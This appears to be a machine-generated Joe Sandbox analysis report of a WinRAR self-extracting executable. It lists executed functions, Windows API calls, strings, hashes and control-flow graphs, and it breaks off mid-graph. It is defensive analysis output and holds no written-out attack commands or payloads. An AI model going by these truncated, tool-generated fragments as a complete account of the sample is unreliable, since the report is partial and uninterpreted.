50cd7b _wcschr 42133->42136 42135 50d40a 42143 50c793 _abort _wcslen _wcsrchr 42136->42143 42146 50d78f 42136->42146 42137 50ca67 SetWindowTextW 42137->42143 42141 50cc31 GetDlgItem SetWindowTextW SendMessageW 42141->42143 42143->42135 42143->42137 42143->42141 42144 50cc71 SendMessageW 42143->42144 42145 4f4092 _swprintf 5 API calls 42143->42145 42156 4fb991 5 API calls 3 library calls 42143->42156 42157 4fa5d1 FindFirstFileW FindFirstFileW 42143->42157 42158 50b48e 23 API calls 2 library calls 42143->42158 42159 513e3e 42143->42159 42144->42143 42145->42143 42148 50d799 _abort _wcslen 42146->42148 42147 50d93d 42149 50d9e7 42147->42149 42151 50d9de ShowWindow 42147->42151 42148->42147 42148->42149 42171 4fa231 42148->42171 42149->42143 42151->42149 42152 50d925 42174 50dc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 42152->42174 42153 50d8ba 42153->42147 42153->42149 42153->42152 42154 50d91b ShowWindow 42153->42154 42154->42152 42156->42143 42157->42143 42158->42143 42160 518e54 42159->42160 42161 518e61 42160->42161 42162 518e6c 42160->42162 42163 518e06 __vswprintf_c_l 2 API calls 42161->42163 42164 518e74 42162->42164 42169 518e7d _unexpected 42162->42169 42167 518e69 42163->42167 42165 518dcc _free 2 API calls 42164->42165 42165->42167 42166 518e82 42181 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42166->42181 42167->42143 42169->42166 42169->42167 42182 517a5e UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 42169->42182 42175 4fa243 42171->42175 42174->42147 42176 50ec50 42175->42176 42177 4fa250 GetFileAttributesW 42176->42177 42178 4fa23a 42177->42178 42179 4fa261 42177->42179 42178->42153 42179->42178 42180 4fa279 GetFileAttributesW 42179->42180 42180->42178 42181->42167 42182->42169 42971 4f9a74 42972 4f9a7e 42971->42972 42973 4f9b9d SetFilePointer 42972->42973 42974 4f981a 24 API calls 42972->42974 42975 4f9b79 42972->42975 42976 4f9ab1 42972->42976 42973->42976 42974->42975 42975->42973 42977 4f10d0 42982 4f5abd 42977->42982 42983 4f5ac7 __EH_prolog 42982->42983 42984 4fb505 25 API calls 42983->42984 42985 4f5ad3 42984->42985 42989 4f5cac NtQueryInformationProcess GetSystemInfo 42985->42989

                                      Executed Functions

                                      Function 0050B7E0 Relevance: 90.0, APIs: 37, Strings: 14, Instructions: 731windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0050B7E5
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050B8D1
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B8EF
                                      • IsDialogMessageW.USER32(?,?), ref: 0050B902
                                      • TranslateMessage.USER32(?), ref: 0050B910
                                      • DispatchMessageW.USER32(?), ref: 0050B91A
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0050B93D
                                      • EndDialog.USER32(?,00000001), ref: 0050B960
                                      • GetDlgItem.USER32(?,00000068), ref: 0050B983
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0050B99E
                                      • SendMessageW.USER32(00000000,000000C2,00000000,005235F4), ref: 0050B9B1
                                        • Part of subcall function 0050D453: _wcschr.LIBVCRUNTIME ref: 0050D45C
                                        • Part of subcall function 0050D453: _wcslen.LIBCMT ref: 0050D47D
                                      • SetFocus.USER32(00000000), ref: 0050B9B8
                                      • _swprintf.LIBCMT ref: 0050BA24
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                        • Part of subcall function 0050D4D4: GetDlgItem.USER32(00000068,0054FCB8), ref: 0050D4E8
                                        • Part of subcall function 0050D4D4: ShowWindow.USER32(00000000,00000005,?,?,0050AF07,00000001,?,?,0050B7B9,0052506C,0054FCB8,0054FCB8,00001000,00000456,00000000,00531098), ref: 0050D510
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0050D51B
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005235F4), ref: 0050D529
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D53F
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0050D559
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D59D
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0050D5AB
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D5BA
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D5E1
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005243F4), ref: 0050D5F0
                                      • _swprintf.LIBCMT ref: 0050BAC2
                                      • _swprintf.LIBCMT ref: 0050BB7C
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0050BC6F
                                      • _swprintf.LIBCMT ref: 0050BD1E
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050BD7D
                                      • SetDlgItemTextW.USER32(?,00000065,005235F4), ref: 0050BD94
                                      • GetDlgItem.USER32(?,00000065), ref: 0050BD9D
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0050BDAC
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0050BDBB
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050BE68
                                      • _wcslen.LIBCMT ref: 0050BEBE
                                      • _swprintf.LIBCMT ref: 0050BEE8
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0050BF32
                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0050BF4C
                                      • GetDlgItem.USER32(?,00000068), ref: 0050BF55
                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0050BF6B
                                      • GetDlgItem.USER32(?,00000066), ref: 0050BF85
                                      • SetWindowTextW.USER32(00000000,0053A472), ref: 0050BFA7
                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0050C007
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050C01A
                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0050C0BD
                                      • EnableWindow.USER32(00000000,00000000), ref: 0050C197
                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0050C1D9
                                        • Part of subcall function 0050C73F: __EH_prolog.LIBCMT ref: 0050C744
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050C1FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$ItemSend$Text$Window$_swprintf$Dialog$H_prologLong_wcslen$DispatchEnableExecuteFocusParamShellShowTranslate__vswprintf_c_l_wcschr
                                      • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDv<P$STARTDLG$^P$__tmp_rar_sfx_access_check_%u$hP$runas$winrarsfxmappingfile.tmp
                                      • API String ID: 1533452614-19397719
                                      • Opcode ID: 72cca35c94f1cc0976d0be40e28289ef57c826fb8bf2007d9e510a07405e5ee2
                                      • Instruction ID: 94db0e6e9d0a0cffe48a28a0f0cde039ccc5b096f5dfcec76c316acbe6c194cb
                                      • Opcode Fuzzy Hash: 72cca35c94f1cc0976d0be40e28289ef57c826fb8bf2007d9e510a07405e5ee2
                                      • Instruction Fuzzy Hash: E542E670944349BAFB219BB09C8EFBE3F6CBB22704F000155F644A61E2CB795E48DB25
                                      Function 0050DF1E Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 195windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 768 50df1e-50df66 call 500863 call 50a64d call 50ac16 call 50fff0 778 50dfe6-50e0f4 call 4f4092 LoadIconW call 50b6dd call 4fda42 call 5090b7 * 2 DialogBoxParamW call 509178 * 2 768->778 779 50df68-50df74 call 50c5c4 768->779 816 50e0f6 778->816 817 50e0fd-50e104 778->817 783 50dfe0-50dfe1 call 50dbde 779->783 784 50df76-50df8d 779->784 783->778 789 50dfd6-50dfde 784->789 790 50df8f-50df9e 784->790 789->778 795 50dfa0-50dfcb call 510320 call 50dbde 790->795 796 50dfcd-50dfd4 790->796 795->796 796->789 816->817 818 50e106 call 50ae2f 817->818 819 50e10b-50e11c call 4ff279 817->819 818->819 823 50e12a-50e13d DeleteObject 819->823 824 50e11e-50e129 call 50ee5c 819->824 826 50e146-50e14d 823->826 827 50e13f-50e140 DeleteObject 823->827 824->823 828 50e167-50e175 826->828 829 50e14f-50e156 826->829 827->826 832 50e177-50e17d call 50dc3b 828->832 833 50e189-50e196 828->833 829->828 831 50e158-50e162 call 4f6d83 829->831 831->828 832->833 836 50e198-50e1a4 833->836 837 50e1ba-50e1be call 50ac7c 833->837 840 50e1b4-50e1b6 836->840 841 50e1a6-50e1ae 836->841 842 50e1c3-50e1ce 837->842 840->837 844 50e1b8 840->844 841->837 843 50e1b0-50e1b2 841->843 843->837 844->837
                                      APIs
                                        • Part of subcall function 0050AC16: OleInitialize.OLE32(00000000), ref: 0050AC2F
                                        • Part of subcall function 0050AC16: SHGetMalloc.SHELL32(00538438), ref: 0050AC70
                                      • _swprintf.LIBCMT ref: 0050E048
                                      • LoadIconW.USER32(00000000,00000064), ref: 0050E078
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0050E0C9
                                      • DeleteObject.GDI32 ref: 0050E130
                                      • DeleteObject.GDI32(?), ref: 0050E140
                                        • Part of subcall function 0050DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,00000000), ref: 0050DC30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: DeleteObject$DialogEnvironmentIconInitializeLoadMallocParamVariable_swprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzT
                                      • API String ID: 730176925-793314549
                                      • Opcode ID: 715ff0361537609d0f98be33efa51365a0e92bccb1882c1449b2cb93c41022e6
                                      • Instruction ID: 217b6390b1e001fa7c7c786d6c3cdd151a61110a6f28ff89035e33dc44464f0a
                                      • Opcode Fuzzy Hash: 715ff0361537609d0f98be33efa51365a0e92bccb1882c1449b2cb93c41022e6
                                      • Instruction Fuzzy Hash: B361C671904345ABD320AB75EC4EF6F7FA8FFA6704F000429F545922E1EB789948D761
                                      Function 004FA69B Relevance: 3.1, APIs: 2, Instructions: 105fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1066 4fa69b-4fa6bf call 50ec50 1069 4fa727-4fa730 1066->1069 1070 4fa6c1-4fa6ce FindFirstFileW 1066->1070 1071 4fa742-4fa7ff call 500602 call 4fc310 call 5015da * 3 1069->1071 1076 4fa732-4fa740 1069->1076 1070->1071 1072 4fa6d0-4fa6e2 call 4fbb03 1070->1072 1090 4fa804-4fa811 1071->1090 1079 4fa6fe-4fa707 1072->1079 1080 4fa6e4-4fa6fc FindFirstFileW 1072->1080 1084 4fa719-4fa722 1076->1084 1087 4fa709-4fa70c 1079->1087 1088 4fa717 1079->1088 1080->1071 1080->1079 1084->1090 1087->1088 1091 4fa70e-4fa711 1087->1091 1088->1084 1091->1088 1093 4fa713-4fa715 1091->1093 1093->1084
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,004FA592,000000FF,?,?), ref: 004FA6C4
                                        • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,004FA592,000000FF,?,?), ref: 004FA6F2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FileFindFirst$_wcslen
                                      • String ID:
                                      • API String ID: 1818217402-0
                                      • Opcode ID: d97782d52b438650ad03c72f8bfac412c25e627de7c1c6d398fd80bf0bbe98d7
                                      • Instruction ID: bc243ea7983c825a14c382de21db1a9f4c67d3cbe909b3384c66b42fe0b4db73
                                      • Opcode Fuzzy Hash: d97782d52b438650ad03c72f8bfac412c25e627de7c1c6d398fd80bf0bbe98d7
                                      • Instruction Fuzzy Hash: EC418372500519ABC725EF64CC88AEEB7B8FF48350F104196E95DD3240D738AEA5CF95
                                      Function 04AE685B Relevance: 3.0, APIs: 2, Instructions: 30nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 04AE686F
                                      • GetSystemInfo.KERNELBASE(?), ref: 04AE6881
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID: InfoInformationProcessQuerySystem
                                      • String ID:
                                      • API String ID: 1993426926-0
                                      • Opcode ID: 6ca4d8e22a42c68bcc25d9eb2e803cf2c6eac377ad07fdece4ea93206e43b3d4
                                      • Instruction ID: 220df0cbf321344648a0a82c3a5146d99b637a5185753977fd1e4c75c29d3826
                                      • Opcode Fuzzy Hash: 6ca4d8e22a42c68bcc25d9eb2e803cf2c6eac377ad07fdece4ea93206e43b3d4
                                      • Instruction Fuzzy Hash: 87F01C7660021DABCB04DFA9DC45EDEBFB8EB09750B008019FD06D7250DB309900CBE0
                                      Function 004F848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 47cbe6a4f4952cad57c4eaec9567a1fd68499a99b4f4d356660dca66956b53a5
                                      • Instruction ID: e428ce387d56033045e0c217d1cb12ca0ae52bc1c4c68608dd920dbd9fd224a7
                                      • Opcode Fuzzy Hash: 47cbe6a4f4952cad57c4eaec9567a1fd68499a99b4f4d356660dca66956b53a5
                                      • Instruction Fuzzy Hash: D0821B7090414DAEDF15DB60C895BFBBBB9AF05304F0841BFEA499F242CB385A84C769
                                      Function 00517DEE Relevance: .0, Instructions: 21COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 80b9b88425a003413ec7d23cd5ae67585516dc15a48fec49513479e37bd6e823
                                      • Instruction ID: 9b9fae30690265e74fa127e3df547d916863e91622b5a164321b6e7327847502
                                      • Opcode Fuzzy Hash: 80b9b88425a003413ec7d23cd5ae67585516dc15a48fec49513479e37bd6e823
                                      • Instruction Fuzzy Hash: 95E04F31000148ABDF11BF24DD4E9893FBDFF59341F004494F8058A132CB39DEA6DA90
                                      Function 00500863 Relevance: 128.1, APIs: 4, Strings: 69, Instructions: 316COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,|<R,00000800,?,00000000,?,00000800), ref: 00500C9C
                                      • _swprintf.LIBCMT ref: 00500D4A
                                      • _swprintf.LIBCMT ref: 00500D96
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • _wcslen.LIBCMT ref: 00500DC4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _swprintf$AttributesFile__vswprintf_c_l_wcslen
                                      • String ID: ,<R$D=R$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll$|<R
                                      • API String ID: 2834821262-3884279378
                                      • Opcode ID: 4db60e475fb5a02b6943e2c2d5fe24c76e80c98331b81d1fd3c8814b85b99301
                                      • Instruction ID: ea604e2d52b9acb2c13dda6c019fedaa3ed738a6be72b6a33fe87391f8c7c9bd
                                      • Opcode Fuzzy Hash: 4db60e475fb5a02b6943e2c2d5fe24c76e80c98331b81d1fd3c8814b85b99301
                                      • Instruction Fuzzy Hash: 54D160B1108394ABD3309F50E94DB9FBEE8BF86704F50491DF289961D0DB788A49CF62
                                      Function 0050C73F Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 428windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 375 50c73f-50c757 call 50eb78 call 50ec50 380 50d40d-50d418 375->380 381 50c75d-50c787 call 50b314 375->381 381->380 384 50c78d-50c792 381->384 385 50c793-50c7a1 384->385 386 50c7a2-50c7b7 call 50af98 385->386 389 50c7b9 386->389 390 50c7bb-50c7d0 call 501fbb 389->390 393 50c7d2-50c7d6 390->393 394 50c7dd-50c7e0 390->394 393->390 395 50c7d8 393->395 396 50c7e6 394->396 397 50d3d9-50d404 call 50b314 394->397 395->397 398 50ca7c-50ca7e 396->398 399 50c7ed-50c7f0 396->399 400 50c9be-50c9c0 396->400 401 50ca5f-50ca61 396->401 397->385 412 50d40a-50d40c 397->412 398->397 404 50ca84-50ca8b 398->404 399->397 406 50c7f6-50c850 call 50a64d call 4fbdf3 call 4fa544 call 4fa67e call 4f6edb 399->406 400->397 405 50c9c6-50c9d2 400->405 401->397 403 50ca67-50ca77 SetWindowTextW 401->403 403->397 404->397 408 50ca91-50caaa 404->408 409 50c9d4-50c9e5 call 517686 405->409 410 50c9e6-50c9eb 405->410 463 50c98f-50c9a4 call 4fa5d1 406->463 413 50cab2-50cac0 call 513e13 408->413 414 50caac 408->414 409->410 416 50c9f5-50ca00 call 50b48e 410->416 417 50c9ed-50c9f3 410->417 412->380 413->397 432 50cac6-50cacf 413->432 414->413 421 50ca05-50ca07 416->421 417->421 424 50ca12-50ca32 call 513e13 call 513e3e 421->424 425 50ca09-50ca10 call 513e13 421->425 450 50ca34-50ca3b 424->450 451 50ca4b-50ca4d 424->451 425->424 436 50cad1-50cad5 432->436 437 50caf8-50cafb 432->437 439 50cb01-50cb04 436->439 442 50cad7-50cadf 436->442 438 50cbe0-50cbee call 500602 437->438 437->439 459 50cbf0-50cc04 call 51279b 438->459 443 50cb11-50cb2c 439->443 444 50cb06-50cb0b 439->444 442->397 448 50cae5-50caf3 call 500602 442->448 461 50cb76-50cb7d 443->461 462 50cb2e-50cb68 443->462 444->438 444->443 448->459 456 50ca42-50ca4a call 517686 450->456 457 50ca3d-50ca3f 450->457 451->397 458 50ca53-50ca5a call 513e2e 451->458 456->451 457->456 458->397 474 50cc11-50cc62 call 500602 call 50b1be GetDlgItem SetWindowTextW SendMessageW call 513e49 459->474 475 50cc06-50cc0a 459->475 471 50cbab-50cbce call 513e13 * 2 461->471 472 50cb7f-50cb97 call 513e13 461->472 495 50cb6a 462->495 496 50cb6c-50cb6e 462->496 480 50c855-50c869 463->480 481 50c9aa-50c9b9 call 4fa55a 463->481 471->459 498 50cbd0-50cbde call 5005da 471->498 472->471 485 50cb99-50cba6 call 5005da 472->485 504 50cc67-50cc6b 474->504 475->474 482 50cc0c-50cc0e 475->482 499 50c90f-50c91f 480->499 500 50c86f-50c8a2 call 4fb991 call 4fb690 call 513e13 480->500 481->397 482->474 485->471 495->496 496->461 498->459 499->463 508 50c921-50c930 499->508 516 50c8a4-50c8b3 call 513e13 500->516 517 50c8b5-50c8c3 call 4fbdb4 500->517 504->397 509 50cc71-50cc85 SendMessageW 504->509 508->463 515 50c932-50c935 508->515 509->397 518 50c939-50c965 call 4f4092 515->518 516->517 525 50c8c9-50c908 call 513e13 call 50fff0 516->525 517->481 517->525 529 50c937-50c938 518->529 530 